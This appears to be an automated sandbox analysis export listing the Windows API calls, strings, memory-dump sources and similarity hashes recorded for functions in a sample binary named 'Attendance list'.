                          • Part of subcall function 00917652: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0091758C,80070057,?), ref: 009176A8
                        • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00939B1B
                        • _memset.LIBCMT ref: 00939B28
                        • _memset.LIBCMT ref: 00939C6B
                        • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00939C97
                        • CoTaskMemFree.OLE32(?), ref: 00939CA2
                        Strings
                        • NULL Pointer assignment, xrefs: 00939CF0
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                        • String ID: NULL Pointer assignment
                        • API String ID: 1300414916-2785691316
                        • Opcode ID: f4639c8a837b7151ee7e4edf1371d4f9c1f7047c667a52a9e30ba4bb7a867773
                        • Instruction ID: 6e3097a89e4d18a18549d5ac9927bd091da8cfc7efa5bd62d2b325de674dc7fd
                        • Opcode Fuzzy Hash: f4639c8a837b7151ee7e4edf1371d4f9c1f7047c667a52a9e30ba4bb7a867773
                        • Instruction Fuzzy Hash: BD911471900229ABDB10DFA5D885FDEBBB9FF08710F20415AF519A7281DB71AA44CFA1
                        APIs
                        • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00947093
                        • SendMessageW.USER32(?,00001036,00000000,?), ref: 009470A7
                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 009470C1
                        • _wcscat.LIBCMT ref: 0094711C
                        • SendMessageW.USER32(?,00001057,00000000,?), ref: 00947133
                        • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00947161
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: MessageSend$Window_wcscat
                        • String ID: SysListView32
                        • API String ID: 307300125-78025650
                        • Opcode ID: 312611215c63085c33c57ab0c72ce9bc5ea5c9b7503507f1fc6b35ea2372e61a
                        • Instruction ID: c323a6e38674dd34017c5f45743026caff2faaea72d21a5385a31fe0649a6e46
                        • Opcode Fuzzy Hash: 312611215c63085c33c57ab0c72ce9bc5ea5c9b7503507f1fc6b35ea2372e61a
                        • Instruction Fuzzy Hash: 5841807190430DAFEB219FA4CC85FEAB7ACEF48354F10452AF548E7292D7729D848B60
                        APIs
                          • Part of subcall function 00923E91: CreateToolhelp32Snapshot.KERNEL32 ref: 00923EB6
                          • Part of subcall function 00923E91: Process32FirstW.KERNEL32(00000000,?), ref: 00923EC4
                          • Part of subcall function 00923E91: CloseHandle.KERNEL32(00000000), ref: 00923F8E
                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0093ECB8
                        • GetLastError.KERNEL32 ref: 0093ECCB
                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0093ECFA
                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 0093ED77
                        • GetLastError.KERNEL32(00000000), ref: 0093ED82
                        • CloseHandle.KERNEL32(00000000), ref: 0093EDB7
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                        • String ID: SeDebugPrivilege
                        • API String ID: 2533919879-2896544425
                        • Opcode ID: e9affd1f5a86b1d9dd065143bcf1601b057bc7eb02dbd7c29c75499d75ecca1e
                        • Instruction ID: dc38a9a78b6544b6db547c7a01343b79731f12fbe9b3ff70c1c97da0e9e0a8a9
                        • Opcode Fuzzy Hash: e9affd1f5a86b1d9dd065143bcf1601b057bc7eb02dbd7c29c75499d75ecca1e
                        • Instruction Fuzzy Hash: 3841BB316042119FDB14EF28CCA5F6EB7A4EF80714F08845DF9869B2C2CBB4A804CF96
                        APIs
                        • LoadIconW.USER32(00000000,00007F03), ref: 009232C5
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: IconLoad
                        • String ID: blank$info$question$stop$warning
                        • API String ID: 2457776203-404129466
                        • Opcode ID: 72fd0fcf7841c6558933f6cde04007db4e3f2498e05d888691c531bd6f65e1c2
                        • Instruction ID: 81cb9e4c50d4d738bb74f890a3d4cdc770b8664415379158395223945a97ccde
                        • Opcode Fuzzy Hash: 72fd0fcf7841c6558933f6cde04007db4e3f2498e05d888691c531bd6f65e1c2
                        • Instruction Fuzzy Hash: 28112B3230C3A6FAE7015A55FC42C6EB3DCEF1A774F20802AF524A6181D66DAF4045A6
                        APIs
                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 0092454E
                        • LoadStringW.USER32(00000000), ref: 00924555
                        • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0092456B
                        • LoadStringW.USER32(00000000), ref: 00924572
                        • _wprintf.LIBCMT ref: 00924598
                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 009245B6
                        Strings
                        • %s (%d) : ==> %s: %s %s, xrefs: 00924593
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: HandleLoadModuleString$Message_wprintf
                        • String ID: %s (%d) : ==> %s: %s %s
                        • API String ID: 3648134473-3128320259
                        • Opcode ID: 5bf095981a3fb3a19a31c76cd00571b122708f6c79a6cd7b573cc27a8cec83b4
                        • Instruction ID: 85636f2de7cadf2c147e3a492c88c144719bb03effb2ed050541edd4874ea5e2
                        • Opcode Fuzzy Hash: 5bf095981a3fb3a19a31c76cd00571b122708f6c79a6cd7b573cc27a8cec83b4
                        • Instruction Fuzzy Hash: E90162F790421DBFE710E7A4DD89EE7776CEB09301F0005A5BB49E2051EA749E858B71
                        APIs
                          • Part of subcall function 008C2612: GetWindowLongW.USER32(?,000000EB), ref: 008C2623
                        • GetSystemMetrics.USER32(0000000F), ref: 0094D78A
                        • GetSystemMetrics.USER32(0000000F), ref: 0094D7AA
                        • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0094D9E5
                        • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0094DA03
                        • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0094DA24
                        • ShowWindow.USER32(00000003,00000000), ref: 0094DA43
                        • InvalidateRect.USER32(?,00000000,00000001), ref: 0094DA68
                        • DefDlgProcW.USER32(?,00000005,?,?), ref: 0094DA8B
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                        • String ID:
                        • API String ID: 1211466189-0
                        • Opcode ID: bc7321334e8c6a685ad8aae04abffd70ccdb60a06ab84827b58168869f837569
                        • Instruction ID: 138818aabfe9f722c4c910143689fe235eaba862904169ac4d60b9f26c5075ba
                        • Opcode Fuzzy Hash: bc7321334e8c6a685ad8aae04abffd70ccdb60a06ab84827b58168869f837569
                        • Instruction Fuzzy Hash: 5DB1887960122AEFDF18CF68C985BBD7BB5FF45701F088069EC489B295D734AA50CB90
                        APIs
                        • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,008FC417,00000004,00000000,00000000,00000000), ref: 008C2ACF
                        • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,008FC417,00000004,00000000,00000000,00000000,000000FF), ref: 008C2B17
                        • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,008FC417,00000004,00000000,00000000,00000000), ref: 008FC46A
                        • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,008FC417,00000004,00000000,00000000,00000000), ref: 008FC4D6
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: ShowWindow
                        • String ID:
                        • API String ID: 1268545403-0
                        • Opcode ID: 5cd4296179678a923bedf3806bd4bb067f36cf6692dcd932c4615e0fbf2c6a14
                        • Instruction ID: dd22f8b673f4ea91e911a49b6c3f497ac2a81c3582b66ade8915d3db79956684
                        • Opcode Fuzzy Hash: 5cd4296179678a923bedf3806bd4bb067f36cf6692dcd932c4615e0fbf2c6a14
                        • Instruction Fuzzy Hash: 654116302186989AC7398B389DA8F7F7BB2FF96314F18881DE147C66E0C675E841D711
                        APIs
                        • InterlockedExchange.KERNEL32(?,000001F5), ref: 0092737F
                          • Part of subcall function 008E0FF6: std::exception::exception.LIBCMT ref: 008E102C
                          • Part of subcall function 008E0FF6: __CxxThrowException@8.LIBCMT ref: 008E1041
                        • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 009273B6
                        • EnterCriticalSection.KERNEL32(?), ref: 009273D2
                        • _memmove.LIBCMT ref: 00927420
                        • _memmove.LIBCMT ref: 0092743D
                        • LeaveCriticalSection.KERNEL32(?), ref: 0092744C
                        • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00927461
                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 00927480
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                        • String ID:
                        • API String ID: 256516436-0
                        • Opcode ID: f77bc8c24f75ac36097f46e4e4505bec05978fa26304b895c1a63131b87da509
                        • Instruction ID: bc8a0adfa716a8fdea8c37b79ea172cd25110e8ec723e8aa5d318dab94191f54
                        • Opcode Fuzzy Hash: f77bc8c24f75ac36097f46e4e4505bec05978fa26304b895c1a63131b87da509
                        • Instruction Fuzzy Hash: DD319235908106EBCF10EF99DC85EAFB7B8FF45310B1441A5F904EB256DB709A50DBA1
                        APIs
                        • DeleteObject.GDI32(00000000), ref: 0094645A
                        • GetDC.USER32(00000000), ref: 00946462
                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0094646D
                        • ReleaseDC.USER32(00000000,00000000), ref: 00946479
                        • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 009464B5
                        • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 009464C6
                        • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00949299,?,?,000000FF,00000000,?,000000FF,?), ref: 00946500
                        • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00946520
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                        • String ID:
                        • API String ID: 3864802216-0
                        • Opcode ID: bcfaa29ecccd950f6250d3e1a16f9265b6f18659ab6bb34bb44d2a1a5ae224a9
                        • Instruction ID: ecb5c13d045559cabb10bb7d921b0279225e5793a8c03ea365b8ce752e3dbb2d
                        • Opcode Fuzzy Hash: bcfaa29ecccd950f6250d3e1a16f9265b6f18659ab6bb34bb44d2a1a5ae224a9
                        • Instruction Fuzzy Hash: 26318976215214BFEF208F10CC8AFEB3FADEF4A765F050065FE089A2A1C6759841CB60
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: _memcmp
                        • String ID:
                        • API String ID: 2931989736-0
                        • Opcode ID: e128f52eeb5ee3fa02d0d0b325153998120dfc52b11ea86ace8a43c62c5357ee
                        • Instruction ID: 7831734d2a60a980ed5df68b63a7a2218b5dd32011598145466eb9e6dad0b755
                        • Opcode Fuzzy Hash: e128f52eeb5ee3fa02d0d0b325153998120dfc52b11ea86ace8a43c62c5357ee
                        • Instruction Fuzzy Hash: B82107F27C420DB7DA10E6268D46FFB239CEF66399B040020FD09D6293E761DD55C2A2
                        APIs
                          • Part of subcall function 008C9997: __itow.LIBCMT ref: 008C99C2
                          • Part of subcall function 008C9997: __swprintf.LIBCMT ref: 008C9A0C
                          • Part of subcall function 008DFEC6: _wcscpy.LIBCMT ref: 008DFEE9
                        • _wcstok.LIBCMT ref: 0092EEFF
                        • _wcscpy.LIBCMT ref: 0092EF8E
                        • _memset.LIBCMT ref: 0092EFC1
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                        • String ID: X
                        • API String ID: 774024439-3081909835
                        • Opcode ID: e1eb871df16cd947c32b9450085123dd15d75ef399b50405eecb40506b53940f
                        • Instruction ID: fbf03b4a1ad24a6fd54dd225061938aa408f1ae6ca0269560bd4fb6a3a2558d2
                        • Opcode Fuzzy Hash: e1eb871df16cd947c32b9450085123dd15d75ef399b50405eecb40506b53940f
                        • Instruction Fuzzy Hash: 24C125315083519FC724EB28D895E9AB7F4FF85310F00496DF8999B2A2DB30ED45CB82
                        APIs
                        • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00936F14
                        • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00936F35
                        • WSAGetLastError.WSOCK32(00000000), ref: 00936F48
                        • htons.WSOCK32(?,?,?,00000000,?), ref: 00936FFE
                        • inet_ntoa.WSOCK32(?), ref: 00936FBB
                          • Part of subcall function 0091AE14: _strlen.LIBCMT ref: 0091AE1E
                          • Part of subcall function 0091AE14: _memmove.LIBCMT ref: 0091AE40
                        • _strlen.LIBCMT ref: 00937058
                        • _memmove.LIBCMT ref: 009370C1
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                        • String ID:
                        • API String ID: 3619996494-0
                        • Opcode ID: 935490a95b8a8660a7a8392735838300862904e059e74771684c4a164221a0ca
                        • Instruction ID: 6ecc0d6892f02610857993065e52103ae8050db6ead4dd6af420f1817be7a1cf
                        • Opcode Fuzzy Hash: 935490a95b8a8660a7a8392735838300862904e059e74771684c4a164221a0ca
                        • Instruction Fuzzy Hash: 6C81BC71508300ABD724EB68CC86F6BB7A9EF84714F10891DF5569B2A2DA70ED44CB92
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        APIs
                        • IsWindow.USER32(00FF55E8), ref: 0094B6A5
                        • IsWindowEnabled.USER32(00FF55E8), ref: 0094B6B1
                        • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0094B795
                        • SendMessageW.USER32(00FF55E8,000000B0,?,?), ref: 0094B7CC
                        • IsDlgButtonChecked.USER32(?,?), ref: 0094B809
                        • GetWindowLongW.USER32(00FF55E8,000000EC), ref: 0094B82B
                        • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0094B843
                        Similarity
                        • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                        • String ID:
                        • API String ID: 4072528602-0
                        APIs
                        • _memset.LIBCMT ref: 0093F75C
                        • _memset.LIBCMT ref: 0093F825
                        • ShellExecuteExW.SHELL32(?), ref: 0093F86A
                          • Part of subcall function 008C9997: __itow.LIBCMT ref: 008C99C2
                          • Part of subcall function 008C9997: __swprintf.LIBCMT ref: 008C9A0C
                          • Part of subcall function 008DFEC6: _wcscpy.LIBCMT ref: 008DFEE9
                        • GetProcessId.KERNEL32(00000000), ref: 0093F8E1
                        • CloseHandle.KERNEL32(00000000), ref: 0093F910
                        Strings
                        Similarity
                        • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                        • String ID: @
                        • API String ID: 3522835683-2766056989
                        APIs
                        • GetParent.USER32(?), ref: 0092149C
                        • GetKeyboardState.USER32(?), ref: 009214B1
                        • SetKeyboardState.USER32(?), ref: 00921512
                        • PostMessageW.USER32(?,00000101,00000010,?), ref: 00921540
                        • PostMessageW.USER32(?,00000101,00000011,?), ref: 0092155F
                        • PostMessageW.USER32(?,00000101,00000012,?), ref: 009215A5
                        • PostMessageW.USER32(?,00000101,0000005B,?), ref: 009215C8
                        Similarity
                        • API ID: MessagePost$KeyboardState$Parent
                        • String ID:
                        • API String ID: 87235514-0
                        APIs
                        • GetParent.USER32(00000000), ref: 009212B5
                        • GetKeyboardState.USER32(?), ref: 009212CA
                        • SetKeyboardState.USER32(?), ref: 0092132B
                        • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00921357
                        • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00921374
                        • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 009213B8
                        • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 009213D9
                        Similarity
                        • API ID: MessagePost$KeyboardState$Parent
                        • String ID:
                        • API String ID: 87235514-0
                        APIs
                        Similarity
                        • API ID: _wcsncpy$LocalTime
                        • String ID:
                        • API String ID: 2945705084-0
                        APIs
                          • Part of subcall function 009248AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,009238D3,?), ref: 009248C7
                          • Part of subcall function 009248AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,009238D3,?), ref: 009248E0
                        • lstrcmpiW.KERNEL32(?,?), ref: 009238F3
                        • _wcscmp.LIBCMT ref: 0092390F
                        • MoveFileW.KERNEL32(?,?), ref: 00923927
                        • _wcscat.LIBCMT ref: 0092396F
                        • SHFileOperationW.SHELL32(?), ref: 009239DB
                        Strings
                        Similarity
                        • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                        • String ID: \*.*
                        • API String ID: 1377345388-1173974218
                        APIs
                        • _memset.LIBCMT ref: 00947519
                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 009475C0
                        • IsMenu.USER32(?), ref: 009475D8
                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00947620
                        • DrawMenuBar.USER32 ref: 00947633
                        Strings
                        Similarity
                        • API ID: Menu$Item$DrawInfoInsert_memset
                        • String ID: 0
                        • API String ID: 3866635326-4108050209
                        APIs
                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 0094125C
                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00941286
                        • FreeLibrary.KERNEL32(00000000), ref: 0094133D
                          • Part of subcall function 0094122D: RegCloseKey.ADVAPI32(?), ref: 009412A3
                          • Part of subcall function 0094122D: FreeLibrary.KERNEL32(?), ref: 009412F5
                          • Part of subcall function 0094122D: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00941318
                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 009412E0
                        Similarity
                        • API ID: EnumFreeLibrary$CloseDeleteOpen
                        • String ID:
                        • API String ID: 395352322-0
                        APIs
                        • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 0094655B
                        • GetWindowLongW.USER32(00FF55E8,000000F0), ref: 0094658E
                        • GetWindowLongW.USER32(00FF55E8,000000F0), ref: 009465C3
                        • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 009465F5
                        • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 0094661F
                        • GetWindowLongW.USER32(00000000,000000F0), ref: 00946630
                        • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0094664A
                        Similarity
                        • API ID: LongWindow$MessageSend
                        • String ID:
                        • API String ID: 2178440468-0
                        APIs
                          • Part of subcall function 009380A0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 009380CB
                        • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 009364D9
                        • WSAGetLastError.WSOCK32(00000000), ref: 009364E8
                        • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00936521
                        • connect.WSOCK32(00000000,?,00000010), ref: 0093652A
                        • WSAGetLastError.WSOCK32 ref: 00936534
                        • closesocket.WSOCK32(00000000), ref: 0093655D
                        • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00936576
                        Similarity
                        • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                        • String ID:
                        • API String ID: 910771015-0
                        APIs
                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0091E0FA
                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0091E120
                        • SysAllocString.OLEAUT32(00000000), ref: 0091E123
                        • SysAllocString.OLEAUT32 ref: 0091E144
                        • SysFreeString.OLEAUT32 ref: 0091E14D
                        • StringFromGUID2.OLE32(?,?,00000028), ref: 0091E167
                        • SysAllocString.OLEAUT32(?), ref: 0091E175
                        Similarity
                        • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                        • String ID:
                        • API String ID: 3761583154-0
                        APIs
                          • Part of subcall function 008C1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 008C1D73
                          • Part of subcall function 008C1D35: GetStockObject.GDI32(00000011), ref: 008C1D87
